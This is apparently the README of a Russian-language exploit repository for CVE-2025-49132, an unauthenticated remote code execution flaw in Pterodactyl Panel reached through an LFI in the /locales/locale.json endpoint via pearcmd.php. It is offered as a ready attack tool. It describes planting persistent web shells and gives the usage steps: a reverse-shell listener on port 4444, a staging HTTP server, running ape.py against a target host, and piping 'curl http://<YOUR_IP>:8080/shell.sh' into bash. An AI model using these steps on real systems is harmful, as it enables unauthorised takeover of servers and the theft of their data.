
Автоматический эксплойт для CVE-2025-49132 — критической неаутентифицированной RCE в Pterodactyl Panel. Использует LFI через locale-эндпоинт для развертывания постоянных веб-шеллов и получения доступа к reverse shell.
Этот репозиторий содержит специализированный эксплойт для CVE-2025-49132, критической уязвимости удалённого выполнения кода (RCE) без аутентификации в Pterodactyl Panel (до версии v1.11.11).
Уязвимость существует в конечной точке /locales/locale.json. Манипулируя параметрами запроса locale и namespace, атакующий может использовать Local File Inclusion (LFI) для взаимодействия с pearcmd.php. Это позволяет создавать произвольные файлы и выполнять команды, что приводит к полному компрометации системы.
Скрипт ape.py автоматизирует следующие шаги:
Чтобы добиться успешного обратного вызова на цели, следуйте этому порядку действий:
penelope -p 4444
Промежуточный сервер: Если используется пользовательский shell-скрипт, разместите его через Python:
python3 -m http.server 8080
python3 ape.py --host xxx.xxx.xxx --interactive
shell> curl http://<YOUR_IP>:8080/shell.sh | bash